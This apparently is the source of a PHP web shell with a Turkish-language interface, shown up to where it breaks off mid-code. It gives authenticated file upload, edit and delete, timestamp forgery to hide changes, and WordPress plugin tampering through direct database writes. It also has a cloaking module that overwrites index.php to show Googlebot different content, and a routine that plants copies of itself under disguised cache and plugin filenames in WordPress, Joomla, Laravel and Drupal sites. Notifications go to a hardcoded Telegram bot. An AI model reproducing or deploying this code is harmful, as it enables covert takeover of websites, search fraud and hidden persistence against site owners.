$GLOBALS['fm_just_logged_in'] = true; return ['authenticated' => true]; } return ['authenticated' => false, 'error' => 'Yanlis sifre']; } return ['authenticated' => false]; } $action = isset($_GET['action']) ? $_GET['action'] : (isset($_POST['action']) ? $_POST['action'] : null); $fileParam = isset($_GET['file']) ? $_GET['file'] : (isset($_POST['file']) ? $_POST['file'] : ''); $page = isset($_GET['page']) ? $_GET['page'] : 'files'; $domain = isset($_GET['domain']) ? $_GET['domain'] : (isset($_POST['domain']) ? $_POST['domain'] : ''); $path = isset($_GET['path']) ? $_GET['path'] : (isset($_POST['path']) ? $_POST['path'] : ''); if ($page === 'logout') { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } if (in_array($action, ['upload', 'mkdir', 'delete', 'rename', 'chmod', 'save'])) { header('Content-Type: application/json'); $auth = checkAuth(); if (!isset($auth['authenticated']) || !$auth['authenticated']) { echo json_encode(['ok' => false, 'msg' => 'Auth required']); exit; } $realFull = resolvePath($path ?: detectRoot()); fm_protect($realFull); switch ($action) { case 'mkdir': $dirName = basename(fm_path(isset($_POST['dirname']) ? $_POST['dirname'] : '')); if ($dirName && $realFull) { $newDir = $realFull . '/' . $dirName; if (@mkdir($newDir, 0755, true)) { echo json_encode(['ok' => true]); } else { echo json_encode(['ok' => false, 'msg' => 'Klasor olusturulamadi']); } } else { echo json_encode(['ok' => false, 'msg' => 'Gecersiz isim']); } exit; case 'upload': if (isset($_FILES['file'])) { $target = $realFull . '/' . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { echo json_encode(['ok' => true]); } else { echo json_encode(['ok' => false, 'msg' => 'Yuklenemedi']); } } else { echo json_encode(['ok' => false, 'msg' => 'Dosya yok']); } exit; case 'delete': $target = $realFull . '/' . basename(fm_path(isset($_POST['target']) ? $_POST['target'] : '')); fm_protect($target); if (is_dir($target)) { $cnt = fm_rmdir($target); echo json_encode(['ok' => true, 'count' => $cnt]); } else { $ok = @unlink($target); echo json_encode(['ok' => $ok, 'msg' => $ok ? '' : 'Silinemedi']); } exit; case 'rename': $old = $realFull . '/' . basename(fm_path(isset($_POST['old']) ? $_POST['old'] : '')); $new = $realFull . '/' . basename(fm_path(isset($_POST['new']) ? $_POST['new'] : '')); fm_protect($old); $ok = @rename($old, $new); echo json_encode(['ok' => $ok, 'msg' => $ok ? '' : 'Yeniden adlandirilamadi']); exit; case 'chmod': $target = $realFull . '/' . basename(fm_path(isset($_POST['target']) ? $_POST['target'] : '')); fm_protect($target); $perms = isset($_POST['perms']) ? $_POST['perms'] : '644'; $ok = @chmod($target, octdec($perms)); echo json_encode(['ok' => $ok, 'msg' => $ok ? '' : 'Izin degistirilemedi']); exit; case 'save': $target = fm_path(isset($_POST['file']) ? $_POST['file'] : ''); if (strpos($target, '/') !== 0) { $sRoot = realpath(dirname(__FILE__)) ?: dirname(__FILE__); $target = $sRoot . '/' . $target; } fm_protect($target); if (is_writable($target)) { $ok = @file_put_contents($target, isset($_POST['content']) ? $_POST['content'] : '') !== false; echo json_encode(['ok' => $ok, 'msg' => $ok ? '' : 'Kaydedilemedi']); } else { echo json_encode(['ok' => false, 'msg' => 'Gecersiz yol veya yazma izni yok']); } exit; } } if (isset($_GET['sp']) || isset($_POST['sp'])) { function cj($d) { while (ob_get_level() > 0) ob_end_clean(); header('Content-Type: application/json; charset=utf-8'); echo json_encode($d, JSON_UNESCAPED_UNICODE); exit; } $sr = rtrim(detectRoot(), '/\\'); $spMax = 50000; $spSkip = ['wp-admin','wp-includes','node_modules','vendor','.git','.svn','.hg','storage/framework/views']; if (isset($_GET['m']) && $_GET['m'] === 'apply' || isset($_POST['m']) && $_POST['m'] === 'apply') { $st = (int)(isset($_GET['target']) ? $_GET['target'] : (isset($_POST['target']) ? $_POST['target'] : 0)); if (!$st) cj(array('o' => false, 'e' => 'hedef zaman gerekli')); @set_time_limit(300); $cnt = 0; $stack = array($sr); $visited = array(); $spStart = microtime(true); while ($stack && $cnt < $spMax) { if (microtime(true) - $spStart > 25) break; $dir = array_pop($stack); $realDir = realpath($dir); if ($realDir && isset($visited[$realDir])) continue; if ($realDir) $visited[$realDir] = true; $dh = @opendir($dir); if (!$dh) continue; while (($e = readdir($dh)) !== false) { if ($e[0] === '.') continue; $fp = $dir . '/' . $e; if (@is_dir($fp)) { $skip = false; foreach ($spSkip as $sk) { if (stripos('/' . $e . '/', '/' . $sk . '/') !== false) { $skip = true; break; } } if (!$skip) $stack[] = $fp; continue; } if (@touch($fp, $st, $st)) $cnt++; } closedir($dh); } cj(array('o' => true, 'count' => $cnt, 'target' => $st, 'root' => $sr)); } $st = null; $sc = 0; $stack = array($sr); $visited = array(); $spStart = microtime(true); while ($stack && $sc < $spMax) { if (microtime(true) - $spStart > 8) break; $dir = array_pop($stack); $realDir = realpath($dir); if ($realDir && isset($visited[$realDir])) continue; if ($realDir) $visited[$realDir] = true; $dh = @opendir($dir); if (!$dh) continue; while (($e = readdir($dh)) !== false) { if ($e[0] === '.') continue; $fp = $dir . '/' . $e; if (@is_dir($fp)) { $skip = false; foreach ($spSkip as $sk) { if (stripos('/' . $e . '/', '/' . $sk . '/') !== false) { $skip = true; break; } } if (!$skip) $stack[] = $fp; continue; } $mt = @filemtime($fp); $sc++; if ($mt && ($st === null || $mt < $st)) $st = $mt; } closedir($dh); } $htPath = $sr . '/.htaccess'; $hasHt = @file_exists($htPath); if ($hasHt) { $htMt = @filemtime($htPath); if ($htMt && ($st === null || $htMt > $st)) $st = $htMt; } cj(array('o' => true, 'target' => $st, 'ht' => $hasHt, 'count' => $sc, 'root' => $sr)); } if (isset($_GET['cc']) || isset($_POST['cc'])) { function cj($d) { while (ob_get_level() > 0) ob_end_clean(); header('Content-Type: application/json; charset=utf-8'); echo json_encode($d, JSON_UNESCAPED_UNICODE); exit; } $m = isset($_GET['m']) ? $_GET['m'] : (isset($_POST['m']) ? $_POST['m'] : 'scan'); $wpCfg = findWpConfig(); $root = $wpCfg ? dirname($wpCfg) : detectRoot(); $cds = array('wp-content/cache','wp-content/wflogs','wp-content/updraft','wp-content/smush-log','wp-content/autoptimize-cache','wp-content/wp-rocket-cache','wp-content/sg-cachepress','wp-content/litespeed','wp-content/lc-cache','wp-content/cache-themify','wp-content/et-cache','wp-content/elementor/cache','wp-content/jetpack-cache','wp-content/simplepie/cache','wp-content/wpo-cache','wp-content/imagify','wp-content/plugins/wordfence/tmp','wp-content/advanced-cache.php','wp-content/borlabs-cache','wp-content/flying-press','wp-content/async-javascript','wp-content/trie-cache','wp-content/elementor/advanced-cache','wp-content/wp-defender/cache','wp-content/w3-total-cache','wp-content/wp-file-manager/cache','wp-content/jetrack-backup','wp-content/nextgen-backups','wp-content/ai1wm-backups','wp-content/flavor/backups','wp-content/updraft/backup-db','wp-content/backups-dup-pro__pro__free'); $cfs = array('.lscache','advanced-cache.php','wp-content/advanced-cache.php','wp-content/object-cache.php','wp-content/dynamic-cache.php','wp-content/sg-cachepress.php','opcache','.opcache','cache','tmp/cache','wp-content/cache','wp-content/wp-cache-config.php'); $foundDirs = array(); if ($root) { $scanStack = array($root); $scanMax = 200; $scanCnt = 0; while ($scanStack && $scanCnt < $scanMax) { $sd = array_pop($scanStack); $sdh = @opendir($sd); if (!$sdh) continue; while (($se = readdir($sdh)) !== false) { $scanCnt++; if ($se[0] === '.') continue; $sfp = $sd . '/' . $se; if (@is_dir($sfp)) { $lower = strtolower($se); if (in_array($lower, array('cache','caches','cached','tmp','temp','sessions','session','logs','log','backup','backups','backup-db','wigwam'))) { $foundDirs[] = str_replace($root . '/', '', $sfp); } $scanStack[] = $sfp; } elseif (preg_match('/\.(cache|tmp|log)$/i', $se)) { $cfs[] = str_replace($root . '/', '', $sfp); } } closedir($sdh); } } $allCds = array_unique(array_merge($cds, $foundDirs)); if ($m === 'scan') { $found = array(); foreach ($allCds as $cd) { $fp = $root . '/' . $cd; if (!is_dir($fp)) continue; $sz = 0; $fc = 0; $stk = array($fp); while ($stk) { $d = array_pop($stk); $dh = @opendir($d); if (!$dh) continue; while (($e = readdir($dh)) !== false) { if ($e[0] === '.') continue; $f = $d . '/' . $e; if (is_dir($f)) { $stk[] = $f; continue; } $fc++; $sz += @filesize($f); } closedir($dh); } $found[] = array('path'=>$cd, 'type'=>'dir', 'files'=>$fc, 'size'=>$sz); } foreach ($cfs as $cf) { $fp = $root . '/' . $cf; if (@file_exists($fp)) $found[] = array('path'=>$cf, 'type'=>'file', 'files'=>1, 'size'=>@filesize($fp)); } $ts = 0; $tf = 0; foreach ($found as $f) { $ts += $f['size']; $tf += $f['files']; } cj(array('o'=>true, 'items'=>$found, 'totalSize'=>$ts, 'totalFiles'=>$tf)); } if ($m === 'clean') { $cnt = 0; foreach ($allCds as $cd) { $fp = $root . '/' . $cd; if (!is_dir($fp)) continue; $stk = array($fp); while ($stk) { $d = array_pop($stk); $dh = @opendir($d); if (!$dh) continue; while (($e = readdir($dh)) !== false) { if ($e[0] === '.') continue; $f = $d . '/' . $e; if (is_dir($f)) { $stk[] = $f; continue; } if (@unlink($f)) $cnt++; } closedir($dh); @rmdir($d); } @rmdir($fp); } foreach ($cfs as $cf) { $fp = $root . '/' . $cf; if (@file_exists($fp) && @unlink($fp)) $cnt++; } cj(array('o'=>true, 'count'=>$cnt)); } cj(array('o'=>false, 'e'=>'unknown mode')); } if (isset($_GET['wpl']) || isset($_POST['wpl'])) { function cj($d) { while (ob_get_level() > 0) ob_end_clean(); header('Content-Type: application/json; charset=utf-8'); echo json_encode($d, JSON_UNESCAPED_UNICODE); exit; } $m = isset($_GET['m']) ? $_GET['m'] : (isset($_POST['m']) ? $_POST['m'] : 'list'); $wdb = wpConnect(); if (!$wdb) cj(array('o'=>false, 'e'=>'wp-config bulunamadi veya DB baglantisi yok')); $db = $wdb['mysqli']; $tp = $wdb['prefix']; $wpRoot = dirname($wdb['config']); $pDir = $wpRoot . '/wp-content/plugins'; if ($m === 'list') { $rs = $db->query("SELECT option_value FROM `{$tp}options` WHERE option_name='active_plugins' LIMIT 1"); $actRaw = array(); if ($rs && $row = $rs->fetch_row()) { $u = @unserialize($row[0]); if (is_array($u)) $actRaw = array_values($u); } $actMap = array(); foreach ($actRaw as $ap) { $actMap[strtolower($ap)] = true; $actMap[strtolower(dirname($ap))] = true; } $plugins = array(); $dh = @opendir($pDir); if ($dh) { while (($d = readdir($dh)) !== false) { if ($d[0] === '.' || !is_dir($pDir.'/'.$d)) continue; $mf = $pDir.'/'.$d.'/'.$d.'.php'; if (!file_exists($mf)) { $pdh = @opendir($pDir.'/'.$d); if ($pdh) { while (($f=readdir($pdh))!==false) { if ($f[0]==='.'||substr($f,-4)!=='.php') continue; $mf=$pDir.'/'.$d.'/'.$f; break; } closedir($pdh); } } if (!file_exists($mf)) continue; $ct = @file_get_contents($mf, false, null, 0, 8192); $nm=$d; $ds=''; $vr=''; if (preg_match('/Plugin Name:\s*(.+)/i',$ct,$nm2)) $nm=trim($nm2[1]); if (preg_match('/Description:\s*(.+)/i',$ct,$dm)) $ds=trim($dm[1]); if (preg_match('/Version:\s*(.+)/i',$ct,$vm)) $vr=trim($vm[1]); $bn = $d . '/' . basename($mf); $isActive = isset($actMap[strtolower($bn)]) || isset($actMap[strtolower($d)]); $plugins[] = array('slug'=>$d,'name'=>$nm,'desc'=>$ds,'ver'=>$vr,'active'=>$isActive,'file'=>basename($mf)); } closedir($dh); } usort($plugins, function($a,$b){ $c = $b['active'] == $a['active'] ? 0 : ($b['active'] ? 1 : -1); return $c ? $c : strcmp($a['name'],$b['name']); }); cj(array('o'=>true,'plugins'=>$plugins,'activeCount'=>count($actRaw))); } if ($m === 'toggle') { $slug = basename(isset($_GET['slug']) ? $_GET['slug'] : (isset($_POST['slug']) ? $_POST['slug'] : '')); if (!$slug || !is_dir($pDir.'/'.$slug)) cj(array('o'=>false,'e'=>'Plugin bulunamadi')); $rs = $db->query("SELECT option_value FROM `{$tp}options` WHERE option_name='active_plugins' LIMIT 1"); $actArr = array(); if ($rs && $row = $rs->fetch_row()) { $u = @unserialize($row[0]); if (is_array($u)) $actArr = array_values($u); } $found = false; $newArr = array(); foreach ($actArr as $ap) { $dirPart = strtolower(dirname($ap)); if ($dirPart === strtolower($slug) || strtolower($slug.'/'.basename($ap)) === strtolower($ap)) { $found = true; continue; } $newArr[] = $ap; } if (!$found) { $mf = $slug.'/'.$slug.'.php'; if (!file_exists($pDir.'/'.$mf)) { $pdh = @opendir($pDir.'/'.$slug); if ($pdh) { while (($f=readdir($pdh))!==false) { if ($f[0]==='.'||substr($f,-4)!=='.php') continue; $mf=$slug.'/'.$f; break; } closedir($pdh); } } $newArr[] = $mf; } $ser = serialize($newArr); $db->query("UPDATE `{$tp}options` SET option_value='$ser' WHERE option_name='active_plugins'"); cj(array('o'=>true,'activated'=>!$found,'slug'=>$slug)); } if ($m === 'delete') { $slug = basename(isset($_GET['slug']) ? $_GET['slug'] : (isset($_POST['slug']) ? $_POST['slug'] : '')); if (!$slug || !is_dir($pDir.'/'.$slug)) cj(array('o'=>false,'e'=>'Plugin bulunamadi')); $rs = $db->query("SELECT option_value FROM `{$tp}options` WHERE option_name='active_plugins' LIMIT 1"); $actArr = array(); if ($rs && $row = $rs->fetch_row()) { $u = @unserialize($row[0]); if (is_array($u)) $actArr = array_values($u); } $wasActive = false; foreach ($actArr as $ap) { if (strtolower(dirname($ap)) === strtolower($slug)) { $wasActive = true; break; } } $newArr = array(); foreach ($actArr as $ap) { $dirPart = strtolower(dirname($ap)); if ($dirPart === strtolower($slug)) continue; $newArr[] = $ap; } $ser = serialize($newArr); $db->query("UPDATE `{$tp}options` SET option_value='$ser' WHERE option_name='active_plugins'"); $stk = array($pDir.'/'.$slug); $cnt = 0; while ($stk) { $d = array_pop($stk); $dh = @opendir($d); if (!$dh) continue; while (($e=readdir($dh))!==false) { if ($e[0]==='.') continue; $f=$d.'/'.$e; if(is_dir($f)){$stk[]=$f;continue;} if(@unlink($f))$cnt++; } closedir($dh); @rmdir($d); } $dirGone = !is_dir($pDir.'/'.$slug); $rs2 = $db->query("SELECT option_value FROM `{$tp}options` WHERE option_name='active_plugins' LIMIT 1"); $stillActive = false; if ($rs2 && $row2 = $rs2->fetch_row()) { $u2 = @unserialize($row2[0]); if (is_array($u2)) { foreach ($u2 as $v) { if (strtolower(dirname($v)) === strtolower($slug)) { $stillActive = true; break; } } } } cj(array('o'=>$dirGone && !$stillActive, 'count'=>$cnt, 'slug'=>$slug, 'dirDeleted'=>$dirGone, 'dbCleaned'=>!$stillActive, 'wasActive'=>$wasActive)); } cj(array('o'=>false,'e'=>'unknown mode')); } if (isset($_GET['a']) || isset($_POST['a'])) { $cloakA = isset($_GET['a']) ? $_GET['a'] : (isset($_POST['a']) ? $_POST['a'] : ''); $ROOT = rtrim(isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : dirname(__FILE__), '/\\'); function cj($d) { while (ob_get_level() > 0) ob_end_clean(); header('Content-Type: application/json; charset=utf-8'); echo json_encode($d, JSON_UNESCAPED_UNICODE); exit; } // CMS tespit (thiscitze v1 mantigi) $cloakCMS = 'generic'; $cloakCMSLabel = 'Generic'; if (file_exists($ROOT . '/wp-config.php') || is_dir($ROOT . '/wp-includes')) { $cloakCMS = 'wp'; $cloakCMSLabel = 'WordPress'; } elseif (file_exists($ROOT . '/configuration.php') && is_dir($ROOT . '/administrator')) { $cloakCMS = 'joomla'; $cloakCMSLabel = 'Joomla'; } elseif (file_exists($ROOT . '/../bootstrap/app.php') || file_exists($ROOT . '/../artisan')) { $cloakCMS = 'laravel'; $cloakCMSLabel = 'Laravel'; } elseif (file_exists($ROOT . '/sites/default/settings.php')) { $cloakCMS = 'drupal'; $cloakCMSLabel = 'Drupal'; } switch ($cloakA) { case 'precheck': $c = array(); $s = 0; $m = 0; $php = version_compare(PHP_VERSION, '7.0', '>='); $c[] = array('name'=>'PHP', 's'=>$php?'ok':'err', 'v'=>PHP_VERSION, 'm'=>$php?'Uygun':'7.0+ gerekli'); $m+=10; if($php)$s+=10; $rw = is_writable($ROOT); $c[] = array('name'=>'Kok yazma', 's'=>$rw?'ok':'warn', 'v'=>$rw?'Acik':'Kapali', 'm'=>$rw?'index.php ezilir':'WP mu-plugin yoluna dusulur'); $m+=10; if($rw)$s+=10; else $s+=5; $cu = function_exists('curl_init'); $c[] = array('name'=>'cURL', 's'=>$cu?'ok':'warn', 'v'=>$cu?'Var':'Yok', 'm'=>$cu?'CF+Bot test calisir':'CF ve bot testi kapali'); $m+=10; if($cu)$s+=10; else $s+=3; $rd = function_exists('gethostbyaddr'); $c[] = array('name'=>'rDNS', 's'=>$rd?'ok':'warn', 'v'=>$rd?'Var':'Yok', 'm'=>$rd?'Verified-Google aktif':'UA-only'); $m+=10; if($rd)$s+=10; else $s+=4; $pd = file_exists($ROOT . '/.render-cache/render-cache.html') && filesize($ROOT . '/.render-cache/render-cache.html') > 100; $c[] = array('name'=>'Perde', 's'=>$pd?'ok':'warn', 'v'=>$pd?'Hazir':'Yok', 'm'=>$pd?'Cloak icin hazir':'Once perde HTML kaydedin'); $m+=10; if($pd)$s+=10; else $s+=3; $sv = strtolower(isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : ''); $st = (strpos($sv,'litespeed')!==false||strpos($sv,'apache')!==false)?'ok':'info'; $c[] = array('name'=>'Sunucu', 's'=>$st, 'v'=>preg_replace('/[^a-zA-Z0-9]/','',explode('/',$sv)[0]?:'?'), 'm'=>$st==='ok'?'.htaccess destegi var':'.htaccess destegi yok'); $m+=10; $s+=10; $sk = $m>0 ? round(($s/$m)*100) : 0; cj(array('score'=>$sk,'verdict'=>$sk>=70?'ok':($sk>=40?'mid':'bad'),'checks'=>$c,'ts'=>time())); case 'autocloak': $pdir = $ROOT . '/.render-cache'; if (!is_dir($pdir)) @mkdir($pdir, 0755, true); if (!file_exists($pdir . '/index.html')) @file_put_contents($pdir . '/index.html', ''); $pperde = $pdir . '/render-cache.html'; if (!file_exists($pperde) || filesize($pperde) < 100) { @file_put_contents($pperde, 'SEO TEST

SEO TEST PAGE
Google bot test

'); } @file_put_contents($pdir . '/render.lock', '1'); $self = @file_get_contents(__FILE__); if ($self) @file_put_contents($pdir . '/.panel-helper.php', $self); $idx = $ROOT . '/index.php'; $bak = $ROOT . '/.render-orig.php'; $idx_w = file_exists($idx) ? is_writable($idx) : is_writable($ROOT); $met = array(); if ($idx_w) { if (file_exists($idx) && !file_exists($bak)) { $cur = @file_get_contents($idx); if ($cur && strpos($cur, 'thiscitze') === false) @file_put_contents($bak, $cur); } if ($cloakCMS === 'joomla') { $fallback = 'define("_JEXEC",1);define("JPATH_BASE",__DIR__);if(file_exists(__DIR__."/includes/defines.php"))require_once __DIR__."/includes/defines.php";if(file_exists(__DIR__."/includes/framework.php"))require_once __DIR__."/includes/framework.php";if(class_exists("\\\\Joomla\\\\CMS\\\\Factory")){$app=\\Joomla\\CMS\\Factory::getApplication("site");$app->execute();}'; } elseif ($cloakCMS === 'laravel') { $fallback = 'define("LARAVEL_START",microtime(true));require __DIR__."/../vendor/autoload.php";$app=require_once __DIR__."/../bootstrap/app.php";$app->handleRequest(\\Illuminate\\Http\\Request::capture());'; } else { $fallback = '$_h=__DIR__."/index.html";if(!file_exists($_h))$_h=__DIR__."/index.htm";if(file_exists($_h)){header("Content-Type:text/html; charset=UTF-8");readfile($_h);die();}'; } $tpl = '0)@ob_end_clean();header("Content-Type:text/html; charset=UTF-8");header("Cache-Control: no-store, no-cache, must-revalidate");header("Vary: User-Agent");readfile($_pd);die();} }} $_orig=__DIR__."/.render-orig.php"; if(file_exists($_orig)&&filesize($_orig)>100){require$_orig;return;} ' . $fallback . ';'; @file_put_contents($idx, $tpl); $met[] = 'index.php'; if (function_exists('opcache_invalidate')) @opcache_invalidate($idx, true); } cj(array('status'=>'ok','methods'=>$met,'msg'=>'Cloak kuruldu!')); case 'revert': foreach (array($ROOT . '/.render-cache/render.lock', $ROOT . '/wp-content/uploads/wp-media-cache/render.lock') as $l) { if (file_exists($l)) @unlink($l); } cj(array('status'=>'ok','msg'=>'Cloak kapatildi.')); case 'uninstall': $idx = $ROOT . '/index.php'; $bak = $ROOT . '/.render-orig.php'; if (file_exists($idx) && file_exists($bak)) { $bc = @file_get_contents($bak); if ($bc && strpos($bc, 'thiscitze') === false) { @file_put_contents($idx, $bc); if (function_exists('opcache_invalidate')) @opcache_invalidate($idx, true); } } $pdir = $ROOT . '/.render-cache'; if (is_dir($pdir)) { foreach (scandir($pdir) as $f) { if ($f !== '.' && $f !== '..') @unlink($pdir . '/' . $f); } @rmdir($pdir); } if (file_exists($bak)) @unlink($bak); cj(array('status'=>'ok','msg'=>'Tamamen kaldirildi.')); case 'cleanht': $ht = $ROOT . '/.htaccess'; if (!file_exists($ht)) { echo 'OK'; exit; } $c = file_get_contents($ht); if ($c === false) { echo 'ERR'; exit; } $o = $c; foreach (array('/#\s*BEGIN\s+WP-Media-Cache[^#]*#\s*END\s+WP-Media-Cache[^\n]*\n?/si','/#\s*BEGIN\s+[A-Z]+-RENDER[^#]*#\s*END\s+[A-Z]+-RENDER[^\n]*\n?/si','/#\s*BEGIN\s+thiscitze[^#]*#\s*END\s+thiscitze[^\n]*\n?/si','/\s*DirectoryIndex\s+index\.php[^<]*<\/IfModule>\s*\n?/si') as $pat) { $c = preg_replace($pat, '', $c); } $c = trim($c); echo ($c !== $o) ? (file_put_contents($ht, $c) ? 'OK' : 'ERR') : 'CLEAN'; exit; case 'botcheck': if (!function_exists('curl_init')) { cj(array('error'=>'cURL yok')); } $sc = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http'; $ch = curl_init($sc . '://' . $_SERVER['HTTP_HOST'] . '/'); curl_setopt_array($ch, array(CURLOPT_RETURNTRANSFER=>true,CURLOPT_USERAGENT=>'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',CURLOPT_TIMEOUT=>15,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_SSL_VERIFYPEER=>false)); $body = (string)curl_exec($ch); $code = (int)curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); $perde_html = ''; foreach (array($ROOT . '/.render-cache/render-cache.html', $ROOT . '/wp-content/uploads/wp-media-cache/render-cache.html') as $p) { if (file_exists($p) && filesize($p) > 100) { $perde_html = file_get_contents($p); break; } } $pt = trim(strip_tags($perde_html)); $bt = trim(strip_tags($body)); $matched = ($pt !== '' && strlen($pt) >= 10 && strpos($bt, substr($pt, 0, 80)) !== false); $lv = file_exists($ROOT . '/.render-cache/render.lock') || file_exists($ROOT . '/wp-content/uploads/wp-media-cache/render.lock'); cj(array('http_code'=>$code,'matched'=>$matched,'cloak_active'=>$lv,'note'=>'Bu test sahte UA ile. Gercek Google GSC ile test edin.')); case 'savehtml': $d = isset($_POST['d']) ? $_POST['d'] : ''; $bin = @hex2bin($d); if ($bin === false || strpos($bin, ' 50) { header('Content-Type: text/html; charset=UTF-8'); readfile($p); exit; } } http_response_code(404); exit; case 'clearcache': @set_time_limit(20); $r = array(); if (function_exists('opcache_reset')) { @opcache_reset(); $r['opcache']='OK'; } else $r['opcache']='N/A'; @clearstatcache(true); $r['stat']='OK'; if (class_exists('Redis')) { try{$rd=new Redis();if(@$rd->connect('127.0.0.1',6379,1)){$rd->flushDB();$rd->close();$r['redis']='OK';}else $r['redis']='N/A';}catch(Exception$e){$r['redis']='N/A';} }else $r['redis']='N/A'; if (class_exists('Memcache')) { try{$mm=new Memcache();if(@$mm->connect('127.0.0.1',11211,1)){$mm->flush();$mm->close();$r['memcache']='OK';}else $r['memcache']='N/A';}catch(Exception$e){$r['memcache']='N/A';} }else $r['memcache']='N/A'; if (function_exists('curl_init')) { $ch=curl_init('http://127.0.0.1:6081/');curl_setopt_array($ch,array(CURLOPT_RETURNTRANSFER=>true,CURLOPT_CUSTOMREQUEST=>'PURGE',CURLOPT_TIMEOUT=>1));curl_exec($ch);$cd=curl_getinfo($ch,CURLINFO_HTTP_CODE);curl_close($ch);$r['varnish']=$cd>0?"PURGE $cd":'N/A';} if ($cloakCMS === 'wp') { $d=$ROOT.'/wp-content/cache'; if(is_dir($d)){$n=0;$it=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($d,RecursiveDirectoryIterator::SKIP_DOTS),RecursiveIteratorIterator::CHILD_FIRST);foreach($it as$f){if($f->isFile()&&@unlink($f->getRealPath()))$n++;}$r['wp_cache']="$n dosya";} else $r['wp_cache']='N/A'; } if ($cloakCMS === 'joomla') { foreach(array('/cache','/administrator/cache','/tmp')as$d){$p=$ROOT.$d;if(is_dir($p)){$n=0;$it=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($p,RecursiveDirectoryIterator::SKIP_DOTS),RecursiveIteratorIterator::CHILD_FIRST);foreach($it as$f){if($f->isFile()&&@unlink($f->getRealPath()))$n++;}$r['joomla_'.basename($d)]="$n dosya";}} } cj($r); case 'fixts': $ht = $ROOT . '/.htaccess'; $tm = file_exists($ht) ? @filemtime($ht) : 0; if (!$tm) { cj(array('s'=>'err','m'=>'.htaccess bulunamadi')); } $n = 0; foreach (array($ROOT . '/index.php', $ROOT . '/.render-cache/render-cache.html') as $f) { if (file_exists($f)) { @touch($f, $tm); $n++; } } cj(array('s'=>'ok','n'=>$n,'t'=>date('Y-m-d H:i:s',$tm))); case 'writegoogle': $name = isset($_POST['b']) ? base64_decode(strtr($_POST['b'], '-_', '+/')) : ''; $content = isset($_POST['d']) ? @hex2bin($_POST['d']) : ''; if (!preg_match('/^google[a-zA-Z0-9]+\.html$/', $name)) { echo 'ERR'; exit; } if (!preg_match('/^google-site-verification:\s*[A-Za-z0-9_\-\.]+\s*$/', trim($content))) { echo 'ERR'; exit; } echo @file_put_contents($ROOT . '/' . $name, $content) ? 'OK' : 'ERR'; exit; case 'rmgoogle': $name = isset($_GET['b']) ? base64_decode(strtr($_GET['b'], '-_', '+/')) : ''; if (!preg_match('/^google[a-zA-Z0-9]+\.html$/', $name)) { echo 'ERR'; exit; } echo @unlink($ROOT . '/' . $name) ? 'OK' : 'ERR'; exit; case 'pr': @set_time_limit(20); $prMode = isset($_GET['m']) ? $_GET['m'] : (isset($_POST['m']) ? $_POST['m'] : 'scan'); $prSelf = @file_get_contents(__FILE__); $prTgBot = '8591778256:AAHrTws8HgI-R5GUASFmrRUHCm6Z4uKKImk'; $prTgChat = '7368669811'; $prNotify = function($msg) use ($prTgBot, $prTgChat) { $url = 'https://api.telegram.org/bot' . $prTgBot . '/sendMessage'; $data = array('chat_id' => $prTgChat, 'text' => $msg, 'parse_mode' => 'HTML', 'disable_web_page_preview' => true); if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, array(CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($data), CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => false)); curl_exec($ch); curl_close($ch); } else { @file_get_contents($url . '?' . http_build_query($data)); } }; $allDisguises = array( 'wp' => array('wp-content/uploads/cache.php','wp-content/uploads/cache/object-cache.php','wp-content/uploads/2024/sunrise.php','wp-content/uploads/media/db.php','wp-content/uploads/backup/wp-cache-config.php','wp-content/upgrade/advanced-cache.php','wp-content/upgrade/temp/force-ssl-admin.php','wp-content/uploads/advanced-cache.php','wp-content/languages/plugins/akismet.php','wp-content/uploads/mu-plugins/sunrise.php'), 'joomla' => array('cache/com_content/model.php','cache/modules/helper.php','cache/system/system.php','cache/view.php','media/system/js/loader.php','media/system/css/style.php','media/jui/css/bootstrap.php','media/jui/js/bootstrap.php','tmp/install/helper.php','tmp/cache.php'), 'laravel' => array('storage/framework/cache.php','storage/framework/views/compile.php','storage/framework/sessions/sess.php','storage/framework/events/event.php','storage/logs/log.php','storage/app/app.php','storage/app/public/storage.php','storage/debugbar/debug.php','storage/app/cache.php','bootstrap/cache/compile.php'), 'drupal' => array('sites/default/files/default.php','sites/default/files/css/css.php','sites/default/files/js/js.php','sites/default/files/images/img.php','sites/default/files/videos/vid.php','sites/default/files/pictures/pic.php','sites/default/files/field/field.php','sites/default/files/ctools/ctools.php','sites/default/files/apachesolr/solr.php','tmp/cache.php'), 'generic' => array('tmp/index.php','cache/index.php','uploads/index.php','storage/index.php','public/index.php','data/index.php','temp/index.php','var/index.php','backup/index.php','logs/index.php') ); $legacyDisguises = array( 'wp' => array('wp-content/advanced-cache.php','wp-content/mu-plugins/sunrise.php'), 'laravel' => array('public/index.php') ); if ($prMode === 'scan') { $dl = array(); $domains = getDomains(); foreach ($domains as $d) { $fp = $d['root']; $e = $d['name']; if (!is_dir($fp)) continue; $cms = fastCMS($fp); $dpaths = $allDisguises[$cms]; $found = 0; $totalSize = 0; foreach ($dpaths as $dp) { $tf = $fp . '/' . $dp; if (file_exists($tf) && filesize($tf) > 100) { $found++; $totalSize += filesize($tf); } } $dl[] = array('d' => $e, 'p' => $fp, 'cms' => $cms, 'count' => $found, 'total' => count($dpaths), 'size' => $totalSize); } cj(array('o' => true, 'list' => $dl, 'current' => isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '')); } if ($prMode === 'deploy') { $root = isset($_GET['d']) ? $_GET['d'] : (isset($_POST['d']) ? $_POST['d'] : ''); $cms = isset($_GET['cms']) ? $_GET['cms'] : (isset($_POST['cms']) ? $_POST['cms'] : 'generic'); $domain = isset($_GET['domain']) ? $_GET['domain'] : (isset($_POST['domain']) ? $_POST['domain'] : ''); if (!$root || !is_dir($root)) cj(array('o' => false, 'e' => 'gecersiz dizin')); if (!$prSelf) 